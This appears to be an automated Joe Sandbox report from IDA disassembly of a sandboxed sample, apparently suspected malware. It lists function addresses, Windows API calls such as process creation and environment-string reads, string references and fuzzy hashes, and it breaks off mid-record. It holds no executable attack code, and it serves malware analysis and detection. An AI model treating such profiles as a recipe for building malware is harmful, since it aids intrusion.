Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: HeBnAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-3361693878
Opcode ID: 690893634bc7b04103c4787aa525d25b036ac67433724b5f8e5d76a344899770
Instruction ID: 11476a4a1bf887ff22358db80352f14adbc6cec19463a705715be7ce659ae0ec
Opcode Fuzzy Hash: 690893634bc7b04103c4787aa525d25b036ac67433724b5f8e5d76a344899770
Instruction Fuzzy Hash: 2F615D75E1CA43F5EA558B24E9062B52BA1BF58B85F8C8435C94EE7391EE3CE5078340

Function 00007FF6502332E0 Relevance: 24.4, APIs: 16, Instructions: 450COMMON

Download Yara Rule

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 00007FF650233354
TlsGetValue.KERNEL32 ref: 00007FF6502333AD
CloseHandle.KERNELBASE ref: 00007FF6502333EB
CloseHandle.KERNEL32 ref: 00007FF6502333F8
TlsSetValue.KERNEL32 ref: 00007FF650233465

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
String ID:
API String ID: 2941551293-0
Opcode ID: 43202f956477dc27eacbe0bad6c7aa482340bc7bd26aed3f552eb178379d61bd
Instruction ID: 2d7b3c2b314e083ae805d55eff69a62f395a36f7d2e633653b5d0567c0b85ee8
Opcode Fuzzy Hash: 43202f956477dc27eacbe0bad6c7aa482340bc7bd26aed3f552eb178379d61bd
Instruction Fuzzy Hash: 21224836A09B07A5EAA4AB19D6883B82BA0FF48B94F4C4535DA0DE33D1DF3CE544C341

Function 00007FF650236D30 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF650236D41
WaitForSingleObject.KERNEL32 ref: 00007FF650236D52
FindAtomA.KERNEL32 ref: 00007FF650236DBF
ReleaseMutex.KERNEL32 ref: 00007FF650236DCD
CloseHandle.KERNEL32 ref: 00007FF650236DD6
CloseHandle.KERNEL32 ref: 00007FF650236DF7

Strings

__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa, xrefs: 00007FF650236DB8
HeBnAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF650236D3A
failed to to lock cleanup mutex, xrefs: 00007FF650236DE8

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: HeBnAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa$failed to to lock cleanup mutex
API String ID: 3776795807-2592781559
Opcode ID: 76ed951a1da5006fb37eb27b3fb7853ab9f1d7b5cb3f352cbd6bb251f6007b27
Instruction ID: 29e35159e65880c68d92658c376ba7cffb06ec9f36f669bf527bcde75ba99343
Opcode Fuzzy Hash: 76ed951a1da5006fb37eb27b3fb7853ab9f1d7b5cb3f352cbd6bb251f6007b27
Instruction Fuzzy Hash: 12218130B19A07E1EE549B51D9191B423A5BF48F84F8CD835C90DE73A0EE3CE446C300

Function 00007FF650232B00 Relevance: 16.7, APIs: 11, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00007FF650232B60

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 83684eaa2f310da3a2962b416053b5bd576d1ab93c177668ba808363dc5378e1
Instruction ID: 7b770a5548073640719c73e1556fd7fd2c18d95c89b33f0c2bf3226a289604cd
Opcode Fuzzy Hash: 83684eaa2f310da3a2962b416053b5bd576d1ab93c177668ba808363dc5378e1
Instruction Fuzzy Hash: E8711732A19B03A5EA609F25E5443B87BA5FF48B94F485635CA5CA73E0EF3CE448C750

Function 00007FF650223E50 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF650223E81
wcslen.MSVCRT ref: 00007FF650223ED7

Part of subcall function 00007FF65024DCA0: memcpy.MSVCRT ref: 00007FF65024DD46
Part of subcall function 00007FF65024DCA0: memcpy.MSVCRT ref: 00007FF65024DD71

wcslen.MSVCRT ref: 00007FF650223F77
memcpy.MSVCRT ref: 00007FF6502240A6

Strings

, xrefs: 00007FF650223F8E
@, xrefs: 00007FF65022402B
basic_string::_M_construct null not valid, xrefs: 00007FF6502240C0
0, xrefs: 00007FF650224020
\??\, xrefs: 00007FF650223ED0, 00007FF650223EE9

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpywcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2971582370
Opcode ID: 7495238b72a21c687f4805a010fd0b24f52b5f0a31619b6aaedad348e55fa948
Instruction ID: cede82e81631db9dc08c99014fbbd61979ab2e83c9ef021b0f129b85add1e94a
Opcode Fuzzy Hash: 7495238b72a21c687f4805a010fd0b24f52b5f0a31619b6aaedad348e55fa948
Instruction Fuzzy Hash: 42613532618BC2A5E7708B15E9503ABBBA0FB84784F484225DACD97B99DF7CC048CB40

Function 00007FF65022FFF0 Relevance: 12.1, APIs: 8, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a501e650562609571778c3cd1784df29f064d19f048f6386f3ce533cf91eed7
Instruction ID: 20d7136ed2772db7bc859c0e6c7d8173948bdf2011629a0ba0a84beb969d165b
Opcode Fuzzy Hash: 3a501e650562609571778c3cd1784df29f064d19f048f6386f3ce533cf91eed7
Instruction Fuzzy Hash: BA51B032A09A07A0EE159F15D6A06F827A4FF58B84F9C8436DE4CA7391DE3CE542C320

Function 00007FF650223790 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF650223818

Part of subcall function 00007FF65024DCA0: memcpy.MSVCRT ref: 00007FF65024DD46
Part of subcall function 00007FF65024DCA0: memcpy.MSVCRT ref: 00007FF65024DD71

wcslen.MSVCRT ref: 00007FF6502238A6
memcpy.MSVCRT ref: 00007FF6502239BE

Strings

@, xrefs: 00007FF650223915
0, xrefs: 00007FF65022390A
basic_string::_M_construct null not valid, xrefs: 00007FF6502239D8
, xrefs: 00007FF6502238AB
\??\, xrefs: 00007FF650223811, 00007FF65022382A

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 1844840824-2971582370
Opcode ID: f685c1dfb49a532a6f74636d28d6803134a3beb93b080835381ef93c8ecdc333
Instruction ID: 0b8fefdf3ab299eeb3bb3ab5d69379a6f62a88ed3da3b61f3190c4901cdd6635
Opcode Fuzzy Hash: f685c1dfb49a532a6f74636d28d6803134a3beb93b080835381ef93c8ecdc333
Instruction Fuzzy Hash: F0518C32618B86A1E760CB55E9503AABBA0FBC5784F884135EACD97B99DF7CD044CB00

Function 00007FF650223A90 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF650223AC1
wcslen.MSVCRT ref: 00007FF650223B17

Part of subcall function 00007FF65024DCA0: memcpy.MSVCRT ref: 00007FF65024DD46
Part of subcall function 00007FF65024DCA0: memcpy.MSVCRT ref: 00007FF65024DD71

wcslen.MSVCRT ref: 00007FF650223BB7
memcpy.MSVCRT ref: 00007FF650223CE6

Strings

@, xrefs: 00007FF650223C6B
0, xrefs: 00007FF650223C60
basic_string::_M_construct null not valid, xrefs: 00007FF650223D00
\??\, xrefs: 00007FF650223B10, 00007FF650223B29

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpywcslen
String ID: 0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2209788446
Opcode ID: d23373f5529ebf654f01c0f49d26cfe6344bf8f87aab685a573478317dfccf7f
Instruction ID: 6bcc499502a6ecfeb2a7cacac514423eca6ef848d63046c03528fb5ac53952ba
Opcode Fuzzy Hash: d23373f5529ebf654f01c0f49d26cfe6344bf8f87aab685a573478317dfccf7f
Instruction Fuzzy Hash: 75612432618BC6A5E7708F15E9503AABBA0FB88784F484225DACD97B99DF7CC005CB40

Function 00007FF650222660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF65022269A
CreateProcessInternalW.KERNELBASE ref: 00007FF65022275B

Strings

h, xrefs: 00007FF6502226FE

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CreateInternalProcessmemset
String ID: h
API String ID: 101748716-2439710439
Opcode ID: b4e4dcba329f30833a54755e058ee4a8727679d80d93dd874743d70506113ca5
Instruction ID: adf0d72b10d8ee393f917ed2711121dd8de57b9de194436eba36730b66229727
Opcode Fuzzy Hash: b4e4dcba329f30833a54755e058ee4a8727679d80d93dd874743d70506113ca5
Instruction Fuzzy Hash: 43215532608B82A2E3609B15F41479BB7A4FBC5784F544139EACC97BA8CF7CD149CB00

Function 00007FF65022EDA0 Relevance: 5.1, APIs: 4, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00007FF65022EE1D
free.MSVCRT ref: 00007FF65022EE8D

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e83d905b8e6d7f989beb614296607989d01e7eda541f666251bd15d462b4c4ea
Instruction ID: a6f83b0c847987112bc844715c558ff653a5fc0a5aa24901180ebe6b79e595ee
Opcode Fuzzy Hash: e83d905b8e6d7f989beb614296607989d01e7eda541f666251bd15d462b4c4ea
Instruction Fuzzy Hash: 70519E77E6DA87E5FBA19F50ED553B82B90AF60B14F4D4435CA0CA6392EE2CE8458300

Function 000001B63116F1EC Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 000001B63116F205
FreeEnvironmentStringsW.KERNEL32 ref: 000001B63116F277

Part of subcall function 000001B63116CA0C: HeapAlloc.KERNEL32 ref: 000001B63116CA4A

FreeEnvironmentStringsW.KERNEL32 ref: 000001B63116F2D6

Part of subcall function 000001B63116D744: HeapFree.KERNEL32 ref: 000001B63116D75A
Part of subcall function 000001B63116D744: GetLastError.KERNEL32 ref: 000001B63116D764

Memory Dump Source

Source File: 00000002.00000002.1972724831.000001B631160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B631160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b631160000_GR55Qg1hth.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID:
API String ID: 3331406755-0
Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
Instruction ID: c653a7c7a8e97fcbe10acc3d3cbe3793c31ea996248fb6be0554f38422f0226e
Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
Instruction Fuzzy Hash: 8431B135214B99C1EA64AF23A8502DA77F4B7A4BD4F484229EE8E53BE5DF3DC4418B04

Function 00007FF650224180 Relevance: 4.6, APIs: 3, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF650223790: wcslen.MSVCRT ref: 00007FF650223818
Part of subcall function 00007FF650223790: wcslen.MSVCRT ref: 00007FF6502238A6

GetFileSize.KERNEL32 ref: 00007FF6502241BB
GetProcessHeap.KERNEL32 ref: 00007FF6502241C6
HeapAlloc.KERNEL32 ref: 00007FF6502241D4

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Heapwcslen$AllocFileProcessSize
String ID:
API String ID: 3094376029-0
Opcode ID: 48263fccb3a714390b272899b4db47a009af58d768c624ed699f62f9d4fa888d
Instruction ID: b63e14223ef7d1033838fb8baa3eb86fed8cc0ef8161d88061ca004238c7c90a
Opcode Fuzzy Hash: 48263fccb3a714390b272899b4db47a009af58d768c624ed699f62f9d4fa888d
Instruction Fuzzy Hash: 3B11D337A24A5295EB51EB66B8057577690BB88BBCF880231EE5D47794EF7CC085CB00

Function 00007FF650233DF0 Relevance: 3.7, APIs: 2, Instructions: 652COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF650233FBB

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 802c8f099356226ebeafc1f623a586f21a2a23ee827d75ea52548e2322c19661
Instruction ID: b7af918f2e0644c47047f97b41382760f953953703c74257228ef74f95e5ed32
Opcode Fuzzy Hash: 802c8f099356226ebeafc1f623a586f21a2a23ee827d75ea52548e2322c19661
Instruction Fuzzy Hash: C4620876A09B07A1EA649B09E2443BD7EA1EF48B84F4984B5DE5CA7390EF7CF544C340

Function 00007FF650233CC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF650230CC0: calloc.MSVCRT ref: 00007FF650230E64

fprintf.MSVCRT ref: 00007FF650233DCB

Strings

once %p is %d, xrefs: 00007FF650233DC1

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: callocfprintf
String ID: once %p is %d
API String ID: 3366074580-95064319
Opcode ID: d23a57345116b523a558b25301b5892bde378e1a2c869a01647761ac8f15c107
Instruction ID: 3568dbaff0d03055c4f59bf3197afe5d0be77b0a6b638b01724cc45c9662cbe9
